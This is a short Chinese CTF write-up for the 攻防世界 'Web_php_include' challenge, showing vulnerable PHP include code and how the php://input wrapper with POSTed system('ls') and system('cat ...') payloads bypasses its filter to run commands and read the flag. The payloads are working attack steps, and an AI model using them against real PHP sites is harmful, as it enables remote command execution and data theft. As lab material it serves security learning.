Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
笛秋白7 小时前
快速了解搭建网站流程——全栈网站搭建指南
团队开发·web·web开发·全栈·网站开发
unable code1 天前
攻防世界-Misc-pdf
网络安全·ctf·misc·1024程序员节
风语者日志2 天前
[LitCTF 2023]作业管理系统
前端·网络·安全·web安全·ctf
Pure_White_Sword3 天前
Bugku-Web题目-cookies
web安全·网络安全·ctf
vortex54 天前
用 Scoop 快速部署 JeecgBoot 开发环境:从依赖安装到服务管理
java·windows·springboot·web·开发·jeecg-boot
lally.5 天前
2025强网杯web wp
web
2401_841495645 天前
黑客攻击基础知识
网络·黑客·操作系统·web·计算机结构·应用程序·黑客攻击
任风雨7 天前
11.9.14.ServletContext
web
任风雨7 天前
11.9.13.ServletConfig
web
f0rev3r8 天前
NewStarCTF2025-WEEK3
ctf